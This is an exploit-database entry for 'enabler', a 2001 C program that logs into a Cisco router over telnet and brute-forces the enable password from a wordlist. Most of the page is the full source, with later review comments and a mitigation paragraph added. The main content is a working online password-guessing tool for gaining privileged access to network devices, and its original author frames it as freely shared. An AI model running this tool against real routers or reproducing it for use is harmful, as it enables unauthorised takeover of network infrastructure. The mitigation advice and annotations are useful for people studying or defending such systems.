Cisco Internal Bruteforcer - exploit.company
vendor:
Cisco Router
by:
norby
N/A
CVSS
N/A
Password Bruteforcing
CWE
Product Name: Cisco Router
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2001

Cisco Internal Bruteforcer

This program logs into a Cisco router and tries a list of passwords to find the enable password. It works against routers that ask for a password only as well as those that ask for a username and password, and the author reports successful tests on many 2600 and a few 12008 routers. The concept is simple: brute-forcing a router's enable password after logging in. According to the author, no similar program had been seen before.

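Mitigation: This is online password guessing rather than a software flaw, so no patch applies. Limit which source addresses can reach the router's management login, prefer SSH with per-user authentication over a shared line password, use a long and unique enable secret, rate-limit or lock out repeated failures, and log and alert on runs of failed login or enable attempts coming from one session.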

Source

Exploit-DB raw data:

/*

             .: free source :. .: coded 4 Avatar Corp :.

        enabler.                      
        cisco internal bruteforcer.                    

                                             coder - norby   
                                           concept - anyone

    
  this program just logs into a CISCO router and tries a list of 
  passes looking for the enable one.
  it works in password-only CISCO as well as in login-pass ones and 
  has been successfully tested on many 2600 and a few 12008.
  the prog's concept [bruteforcing a router for gaining enable access] 
  is quite simple ...how amazing I haven't seen similar progs before!

  anti eleet&0day force ;)
  anyway... information wants to be free :) 

                      sciao belli

               saluti a berserker mandarine, acidcrash
               beho x la traduzione :)                                    

          norby
               saluti a *lei*, saluti a gabriella che a capodanno
               non ha voluto lasciare il ragazzo x fare un bambino con me ;) 
               saluti a tutti gli avatar, a sandman, a tutte le diecimila
               persone che conosco
          any
               saluti a Acida, storm\, Raid

 contact`    norby - staff22@infinito.it      anyone - anyone@anyone.org
                www.avatarcorp.org 


neural collapse _ i truly hope in this project

v1 02/10/2k+1
todo for v2: use of threads, implement a passlist recovery 
            (very simple feature)     
*/



#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>

/* Colour-escaped "[`]" tag that every status message prints first. */
#define BOX                     "\033[0m\033[34;1m[\033[0m\033[37;1m`\033[0m\033[34;1m]"

/* Shared state: the functions below communicate through these globals. */
struct sockaddr_in addr;   /* peer address filled in by sock() */
char host[100];            /* dotted-quad text of the target, written by resolve() */
struct hostent *hp;        /* gethostbyname() result used by resolve() */
int sock_stat;             /* descriptor of the one TCP session shared by login() and brute() */

int n,x;                   /* n: entries of password[] already sent by brute(); x: entries stored by loadwordlist() */
char **password;           /* list built by loadwordlist(); the slot after the last entry is set to 0 */

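/*
 * Fill the global `host` with a dotted-quad string for `inputhost`.
 *
 * Input that starts with four dot-separated integers is copied as given (the
 * numbers are not range-checked here); anything else is looked up with
 * gethostbyname() and the first four bytes of the first address are
 * formatted. Prints an error and exits when the lookup fails.
 *
 * Returns 0. The original fell off the end of a non-void function; callers in
 * this file ignore the value.
 */
char resolve(char *inputhost) {

    int a,b,c,d;

    if (sscanf(inputhost,"%d.%d.%d.%d",&a,&b,&c,&d) !=4) {
       hp = gethostbyname(inputhost);
       if (hp == NULL) { printf("%s error on host resolving\n\033[0m\n", BOX); exit(0); }
       /* The formatting below reads four address bytes, so refuse anything
          that is not a 4-byte IPv4 answer instead of indexing past it. */
       if (hp->h_addrtype != AF_INET || hp->h_length < 4 || hp->h_addr_list[0] == NULL) {
          printf("%s error on host resolving\n\033[0m\n", BOX); exit(0);
       }
       snprintf(host, sizeof host, "%d.%d.%d.%d",
                (unsigned char)hp->h_addr_list[0][0],
                (unsigned char)hp->h_addr_list[0][1],
                (unsigned char)hp->h_addr_list[0][2],
                (unsigned char)hp->h_addr_list[0][3]);
    }
    else {
       /* strncpy(host, inputhost, 100) left `host` unterminated for inputs of
          100 bytes or more; snprintf always writes the terminating NUL. */
       snprintf(host, sizeof host, "%s", inputhost);
    }
    return 0;
}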
 
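/*
 * Open a TCP connection to `hostoresolve` (a dotted-quad string) on `port`
 * and store the descriptor in the global `sock_stat`; the peer address is
 * kept in the global `addr`. Prints an error and exits if the socket cannot
 * be created or the connection fails.
 *
 * Returns 0. The original returned no value from an int function.
 */
int sock(char *hostoresolve,int port) {

    int err;

    sock_stat = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sock_stat<0) { printf("%s error opening socket\n\033[0m\n", BOX); exit(0); }

    /* sin_family takes an address family (AF_*), not a protocol family. */
    addr.sin_family = AF_INET;
    addr.sin_port = htons((unsigned short)port);
    /* Use the argument: the original ignored it and read the global `host`,
       which is what the only caller passes in anyway. */
    addr.sin_addr.s_addr = inet_addr(hostoresolve);

    err = connect(sock_stat, (struct sockaddr *) &addr, sizeof(addr));
    if (err < 0) { printf("%s error opening connection\n\033[0m\n", BOX); exit(0); }

    return 0;
}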

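/*
 * Print the three-line program banner, each line prefixed with BOX.
 * Returns 0 (the original returned no value from an int function).
 */
int banner() {
    printf("\n%s enabler.\n", BOX);
    printf("%s         cisco internal bruteforcer. concept by anyone\n", BOX);
    printf("%s                                       coded by norby\n", BOX);
    return 0;
}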
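/*
 * Print the command-line synopsis; `argv` is the program name to show.
 * Returns 0 (the original returned no value from an int function).
 */
int usage(char *argv) {
    printf("%s usage: %s <ip> [-u user] <pass> <passlist> [port]\n\n\033[0m", BOX, argv);
    return 0;
}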

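/*
 * SIGINT handler: if any passwords were sent (global `n` > 0) print the
 * count, then reset the terminal colours and exit.
 *
 * The handler now takes the int argument that signal() passes; the original
 * was defined with an empty parameter list, so calling it with one argument
 * was undefined behaviour.
 */
void sig(int signo) {
     (void)signo;   /* the signal number is not needed */

     /* NOTE(review): printf() and exit() are not async-signal-safe; kept
        because the message needs formatted output. */
     if(n>0) { printf("%s %i passwords tryed. no password matching. leaving\n",BOX,n); }
     printf("\n\033[0m"); exit(0);
}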

/*
 * Drive the first login dialogue on the already-connected socket `sock_stat`.
 *
 * Reads until the peer output contains a login/username prompt or a password
 * prompt, sends `login` (only when a username prompt was seen) followed by
 * `pass`, then scans the reply: a '>' is reported as a successful login and a
 * new "sername:" prompt is reported as a rejected password and ends the
 * program. The sentinel login "n0login" means the caller supplied no
 * username. The equivalent check for a repeated password-only prompt is
 * commented out below, so that case is not detected here.
 *
 * NOTE(review): declared int but no value is returned, and `input` is never
 * freed.
 */
int login(char *login, char *pass) {

    char *input = malloc(4000);   /* NOTE(review): result is not checked for NULL */
    int reqlogin;                 /* NOTE(review): stays uninitialized if the loop below ends without matching a prompt */

    /* NOTE(review): read() can fill all 4000 bytes and adds no terminator, and
       the first read happens before any bzero(), so strstr() may scan past the
       bytes actually received. */
    while (read (sock_stat, input, 4000) > 0) {      
     if(strstr(input,"ogin:")||strstr(input,"sername:")) { 
        if(!strcmp(login,"n0login")) { 
          printf("%s username needed... give me a username next time :)\n\n\033[0m", BOX); 
          exit(0);
        }
        printf("%s login requested. sending [%s] and [%s]\n", BOX, login, pass); reqlogin=1; break; 
     } 
     if(strstr(input,"assword:")) { printf("%s only password needed. sending [%s]\n", BOX, pass); reqlogin=0; break; } 
     bzero(input,4000);
    }

    if(reqlogin==1) {
      write(sock_stat,login,strlen(login)); 
      write(sock_stat,"\r\n",2);

      while(read(sock_stat,input,4000)>0) {
        /* NOTE(review): the ';' ends the if statement, so the block that
           follows runs unconditionally and this loop stops after one read. */
        if(strstr(input,"assword")); { break; }
      }
    }

    /* Return values of write() are ignored throughout. */
    write(sock_stat,pass,strlen(pass)); 
    write(sock_stat,"\r\n",2);

    sleep(2);   /* fixed pause before reading the reply */

    bzero(input,4000);

    while (read (sock_stat, input, 4000) > 0) {
      if(strstr(input,">")) { printf("%s seems we are logged in :)\n", BOX); break; }
  /*    if(strstr(input,"assword:")) {  
        printf("%s sorry... [%s] is not a good password for login :?n\033[0m\n",BOX,pass); exit(0); 
      }*/ 
      if(strstr(input,"sername:")) {
        printf("%s sorry... [%s] is not a good password for login :?n\033[0m\n",BOX,pass); exit(0);
      }
      bzero(input,4000);
    }
}

/*
 * Read the password list file `list` into the global array `password`,
 * counting stored entries in the global `x`.
 *
 * Lines whose first character is '#' or a newline are skipped; every other
 * line is read through a 32-byte buffer, has its newline replaced by NUL and
 * is copied into a fresh 32-byte allocation. The slot after the last entry is
 * set to 0. Exits if the file cannot be opened, if the array cannot be
 * allocated, or if fewer than four entries were stored.
 *
 * NOTE(review): declared int but no value is returned.
 */
int loadwordlist(char *list) {
 
   FILE   *passlist;
   char   buf[32], fake;   /* `fake` is never used */
   int i,z;                /* `z` is never used */

   if ((passlist = fopen(list, "r")) == NULL) { 
      printf("%s sorry, unable to open the passlist [%s]\n\033[0m\n", BOX,list); 
      exit(0); 
   }

   /* NOTE(review): the array is sized to the file length in bytes, but it
      holds one char pointer per entry plus the terminating slot. A list of
      lines shorter than a pointer needs more room than that, so the stores
      below can run past the allocation. ftell() failure (-1) is not checked. */
   (void)fseek(passlist, 0L, SEEK_END);       // a bit of mental gymnastics here
   password = malloc(ftell(passlist));        // to allocate only the memory the passlist needs :P
   if(password == NULL) { 
     printf("%s sorry, can't allocate memory for passlist. buy more ram or cut the passlist\n\033[0m\n",BOX);
     exit(0);
   }  

   (void)fseek(passlist, 0L, SEEK_SET);

   /* NOTE(review): feof() only turns true after a read has hit end of file
      and the fgets() result is ignored, so when the final fgets() fails the
      current contents of buf are processed once more: zeroed by the memset
      after a stored line (giving an extra empty entry), or indeterminate if
      nothing was ever read. */
   while (!feof(passlist)) {
     /* At most 31 characters are taken per call; a longer line continues
        into the next entry. */
     fgets(buf, 32, passlist);
     if (buf[0] == '#' || buf[0] == '\n') continue;
     for (i = 0; i < strlen(buf); i++)
         if (buf[i] == '\n') buf[i] = '\0';
     password[x] = malloc(32);   /* NOTE(review): result is not checked for NULL */
     strcpy(password[x], buf);
     memset(buf, 0, 32);
     x++;
   }
   password[x] = 0x0;
   fclose(passlist);
   /* The test is on the stored-entry count `x`, while the message speaks of
      three passwords. */
   if(x<4) { printf("%s sorry, but passlist must contain at least 3 passwords. leaving \n\033[0m\n",BOX); exit(0); }

}

/*
 * Send "enable" on the logged-in session and answer each password prompt with
 * the next entry of `password`, using the globals `n` (entries sent so far)
 * and `x` (entries loaded). A '#' in the peer output is taken as the
 * privileged prompt and the entry sent just before it is printed; a '>'
 * causes "enable" to be sent again. The function leaves only through exit().
 *
 * NOTE(defender): every candidate is submitted inside one long-lived session,
 * so on the device this is a run of consecutive failed enable attempts from a
 * single connection. Whether that is logged or throttled depends on device
 * configuration that this listing does not show.
 *
 * NOTE(review): declared int but has no return statement; `input` is never
 * freed and its allocation is not checked.
 */
int brute() {  // there is a stupid error... the last password is tryed 2 times... must be fixed... ;)         
   
   char *input = malloc(100);
   int N;   /* never used */

   bzero(input,100);

   write(sock_stat,"enable",6);
   write(sock_stat,"\r\n",2);


   /* NOTE(review): if read() returns 0 or -1 the inner loop ends, but nothing
      leaves this outer loop, so a closed connection can keep it spinning. */
   while(1) { 

     /* NOTE(review): read() can fill all 100 bytes and adds no terminator, so
        the strstr() calls may scan past the buffer. */
     while(read(sock_stat,input,100)>0) {
       if(n==x) { printf("%s %i passwords tried. no valid password found in the passlist\n\033[0m\n",BOX,n-1); exit(0); }
       if(n+1==x) break;
       if(strstr(input,"assword:")||strstr(input,"#")||strstr(input,">")) break;
       bzero(input,100);
     }
   
     /* NOTE(review): if '#' shows up before anything was sent, n is still 0
        and password[n-1] indexes before the start of the array. */
     if(strstr(input,"#")) { printf("%s possible password found: %s\n\033[0m\n",BOX,password[n-1]); exit(0); }

     if(strstr(input,"assword:")) {
       write(sock_stat,password[n],strlen(password[n]));
       write(sock_stat,"\r\n",2);
       n++; 
       bzero(input,100); 
       /* Only the printf() is governed by the if; fflush() always runs. */
       if(n>1) printf("%s %s... wrong password\n", BOX, password[n-2]); fflush(stdout); 
       continue;
     } 
     if(strstr(input,">")) {
       write(sock_stat,"enable\r\n",8); bzero(input,100); 
     }
   }
}

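/* Parse a decimal TCP port; returns -1 unless the whole string is a number in 1..65535. */
static int parse_port(const char *s) {
    char *end;
    long v;

    if (s == NULL || *s == '\0') return -1;
    v = strtol(s, &end, 10);
    if (*end != '\0' || v < 1 || v > 65535) return -1;
    return (int)v;
}

/*
 * Entry point. Accepted forms, as printed by usage():
 *   <ip> <pass> <passlist> [port]
 *   <ip> -u <user> <pass> <passlist> [port]
 * The port defaults to 23. After argument checks the flow is the same in
 * both forms: loadwordlist(), resolve(), sock(), login(), brute().
 *
 * The original indexed argv[5] and argv[6] in the "-u" form without checking
 * that argc was large enough, and took the port from atoi() with no
 * validation; both are checked here, and a bad invocation prints the usage
 * text and exits as other argument errors already did.
 */
int main(int argc, char *argv[]) {

    int port = 23;               /* default when no [port] argument is given */
    int with_user;
    const char *port_arg = NULL;

    signal(SIGINT, sig);

    banner();
    if((argc<=3)||(argc>=8)) { usage(argv[0]); exit(0); }

    with_user = !strcmp(argv[2],"-u");

    if(with_user) {
      /* "-u user pass passlist" needs argv[3]..argv[5] to exist. */
      if(argc<6) { usage(argv[0]); exit(0); }
      if(argc>6) { port_arg = argv[6]; }
    }
    else if(argc>4) { port_arg = argv[4]; }

    if(port_arg != NULL) {
      port = parse_port(port_arg);
      if(port<0) { usage(argv[0]); exit(0); }
    }

    printf("%s\n",BOX);

    if(with_user) {
      loadwordlist(argv[5]);
      resolve(argv[1]);
      sock(host, port);
      login(argv[3],argv[4]);
      brute();
    }
    else {
      loadwordlist(argv[3]);
      resolve(argv[1]);
      sock(host, port);
      login("n0login",argv[2]);   /* sentinel meaning "no username supplied" */
      brute();
    }

    return 0;
}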


// milw0rm.com [2001-01-19]